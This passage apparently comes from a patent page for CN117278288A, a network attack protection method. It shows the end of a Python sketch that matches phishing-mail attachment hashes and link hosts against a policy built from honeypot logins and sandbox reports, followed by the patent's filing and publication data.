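    return (any(h in rules["block_attachment_sha256"] for h in mail.get("attachment_sha256", []))
            or any(h in rules["block_link_hosts"] for h in mail.get("link_hosts", [])))

def maintained_policy() -> dict:
    """Whole pipeline over the constructed inputs: extract, merge, maintain."""
    info = attack_info_from_logins(HONEYPOT_LOGIN_LOG, "honey_user01")
    info.merge(attack_info_from_sandbox(SANDBOX_REPORT))
    return build_protection_policy(info)

if __name__ == "__main__":
    print(json.dumps(maintained_policy(), indent=2))
```

The policy is deliberately a plain dictionary of sorted lists so that it can be diffed between runs and fed to whatever mail gateway, firewall or endpoint agent plays the role of the attack protection program; `merge` keeps the indicator sets deduplicated as further phishing mails are processed, which is what "maintaining" a policy amounts to in practice.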

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN202311261640.3A CN117278288A (en) 2023-09-27 2023-09-27 Network attack protection method and device, electronic equipment and storage medium

Publications (1)

Publication Number Publication Date
CN117278288A true CN117278288A (en) 2023-12-22

Family

ID=89211880

Country Status (1)

Country Link
CN (1) CN117278288A (en)

Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination